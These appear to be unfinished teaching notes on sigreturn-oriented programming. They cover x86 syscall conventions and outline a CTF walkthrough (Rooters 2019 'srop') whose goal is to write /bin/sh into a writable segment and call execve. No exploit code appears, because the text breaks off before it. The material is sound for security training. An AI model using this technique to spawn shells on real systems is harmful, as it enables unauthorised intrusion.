syscalls and SROP: SigReturn Oriented Programming

OK so this is another cool tool for your PWN utility belt.

Here's the promise:

Imagine the ability to set every. single. register. at once.

With that kind of power you can set the instruction pointer to any location and pass it whatever arguments you need.

You could rework the location of the entire stack.

A pretty powerful PWN primitive.

Well all you need is syscall 0xf and about 300 bytes

(In 32-bit that's 0x77 and int 0x80)

Let's see it in action.

What's a syscall?

syscall is a low-level operation where the CODE can call the KERNEL. This is how operating systems separate processes from all the low-level concerns of where files live and spawning a sub-process or interrupting a process, etc.

The way it works is pretty simple LINK TO THE TABLE:

OK so it's a new kind of calling convention:

• when syscall is executed the low-level function you ask the kernel for is determined by RAX
• the args are in RDI, RSI, RDX, R10, R8, R9

If you have a gadget using syscall you'll need a way to load/change RAX (which is the return value of most functions including some syscalls).

In 32-bit it's called int 0x80 not syscall, it also get's its own 32-bit table

Key syscall functions:

• read (reads from stdin)
• write (writes to stdout)
• execve (runs a shell command)
• mmap (create a new segment of memory with permissions)
• open/close for files
• sigreturn (the magical trick in the rest of the notes)

Live Demo: small_boi

Walkthrough time: srop from Rooters 2019

I have the binary for you at /ctf/srop/vuln if you'd like to follow along.

There are also several write-ups on the internet out there which you can use to get started when you're ready.

• Scouting: no win function
• Scouting: pop rax; syscall - not a lot of other gadgets
• Scouting: 0x400 bytes so room for a stack frame
• Scouting: No "/bin/sh\x00" string

So our job is to execve("/bin/sh\x00") and we can control all of the registers at once.

Since we have to manufacture a win function we need to:

• first: write /bin/sh into memory somewhere we know
• second: do syscall with execve using that string address

Minor Aside:

The pwntools ELF tool is awesome.

elf.writable_segments is a list of any segments that are writable.

elf.writable_segments[0].header['p_paddr'] although fart around don't copy paste this one.

Using the SROP:

pwntools makes this easy:

Writing /bin/sh

So we've found a writable segment, let's call it: dataseg

We need to write to the dataseg and craft our own baby stack over there.

So that might look something like this: